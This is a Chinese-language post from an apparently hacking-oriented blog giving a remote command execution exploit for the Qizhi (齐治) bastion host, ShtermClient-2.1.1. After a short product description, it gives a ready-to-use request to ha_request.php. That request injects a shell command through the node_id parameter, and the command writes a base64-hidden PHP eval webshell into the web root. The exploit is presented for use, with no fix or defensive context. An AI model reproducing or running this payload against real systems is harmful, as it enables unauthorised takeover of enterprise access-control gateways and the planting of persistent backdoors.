统计
  • 建站日期:2021-03-15
  • 文章总数:62 篇
  • 评论总数:43 条
  • 分类总数:14 个
  • 最后更新:6天前

齐治堡垒机前台远程命令执行漏洞

本文阅读 2 分钟
首页 渗透测试 正文
广告

登录页面

齐治科技RIS (Risk Insight System)数据中心风险洞察系统简称齐治堡垒机,是面向企业/事业单位及政府部门内部的数据中心运维安全 管理而推出的运维安全核心平台。它主要拥有以下功能:

  • 为用户提供身份验证和业务操作的统一入口
  • 管理和控制用户对各目标资产的访问权限
  • 识别、记录和管理用户在目标资产上进行的操作
  • 简化对用户访问目标资产的各种管理
  • 收集和汇总目标资产的基本信息及实时状态
  • 识别异常情况,评估资产和用户风险

漏洞影响:

ShtermClient-2.1.1

漏洞利用:

1.访问 http://10.20.10.11/listener/cluster_manage.php 返回正常;
2.访问如下链接生成一句话木马

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUW3NoZWxsXSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9zaGVsbC5waHA="|base64${IFS}-d|bash`|${IFS}|echo${IFS}
本文来自投稿,不代表本站立场,如若转载,请注明出处:https://www.cnhacker.cc/PenetrationTest/234.html
-- 展开阅读全文 --
CVE-2021-27890 MyBB后台论坛主题管理SQL注入漏洞
« 上一篇 04-10
Saltstack 任意文件写入漏洞 (CVE-2021-25282)
下一篇 » 04-11
广告

发表评论

成为第一个评论的人

作者信息

广告

动态快讯

热门文章

广告

标签TAG

热评文章